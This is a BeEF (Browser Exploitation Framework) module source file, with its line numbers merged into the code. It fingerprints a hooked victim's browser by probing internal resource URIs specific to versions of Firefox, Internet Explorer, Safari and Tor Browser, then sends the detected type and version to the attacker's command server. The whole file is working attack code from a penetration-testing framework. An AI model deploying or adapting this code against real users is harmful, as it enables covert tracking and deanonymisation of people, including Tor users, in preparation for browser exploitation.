Path: blob/master/modules/browser/browser_fingerprinting/command.js
1154 views
//1// Copyright (c) 2006-2025Wade Alcorn - [email protected]2// Browser Exploitation Framework (BeEF) - https://beefproject.com3// See the file 'doc/COPYING' for copying permission4//56beef.execute(function() {78var browser_type = new Array;9var browser_version = new Array;10var dom = document.createElement('b');1112function unique(array) {13return $.grep(array, function(el, index) {14return index === $.inArray(el, array);15});16}1718parse_browser_details = function() {19if (!browser_type.length) browser_type[0] = "unknown";20if (!browser_version.length) browser_version[0] = "unknown";21beef.net.send("<%= @command_url %>", <%= @command_id %>, "browser_type="+unique(browser_type)+"&browser_version="+unique(browser_version));22};2324// Browser fingerprints // in the form of: "URI","Browser","version(s)"25var fingerprints = new Array(26new Array("Safari","1+","feed://__rsrc__/__rsrc__/NextPage.tif"),27new Array("Firefox","1+","moz-icon://.autoreg?size=16"),28new Array("Firefox","2","resource:///res/html/gopher-audio.gif"),29new Array("Firefox","2-3","jar:resource:///chrome/classic.jar!/skin/classic/browser/Secure.png"),30new Array("Firefox","4-5","resource:///chrome/browser/skin/classic/browser/Secure.png"),31new Array("Firefox","1-6","resource:///chrome/browser/content/branding/icon128.png"),32new Array("Firefox","4+","resource:///chrome/browser/skin/classic/browser/Geolocation-16.png"),33new Array("Firefox","7+","resource:///chrome/browser/content/browser/aboutHome-snippet1.png"),34new Array("Firefox","8+","resource:///chrome/browser/skin/classic/aero/browser/Toolbar-inverted.png"),35new Array("Firefox","9+","resource:///chrome/browser/skin/classic/aero/browser/identity.png"),36new Array("Firefox","10+","chrome://browser/skin/sync-128.png"),37new Array("Firefox","13+","chrome://browser/content/abouthome/noise.png"),38new Array("Firefox","18+","resource:///chrome/browser/skin/classic/aero/browser/webRTC-shareDevice-16.png"),39new Array("Internet Explorer","5-6","res://shdoclc.dll/pagerror.gif"),40new Array("Internet Explorer","7-9","res://ieframe.dll/ielogo.png"),41new Array("Internet Explorer","7+", "res://ieframe.dll/info_48.png"),42new Array("Internet Explorer","10+","res://ieframe.dll/immersivelogo.png"),43new Array("Tor Browser","1+","chrome://browser/content/abouttbupdate/aboutTBUpdateLogo.png")44);4546for (var i=0; i<fingerprints.length; i++) {47var img = new Image;48img.id = fingerprints[i][0];49img.name = fingerprints[i][1];50img.src = fingerprints[i][2];51img.onload = function() { browser_type.push(this.id); browser_version.push(this.name); dom.removeChild(this); }52dom.appendChild(img);53}5455setTimeout('parse_browser_details();', 2000);5657});58596061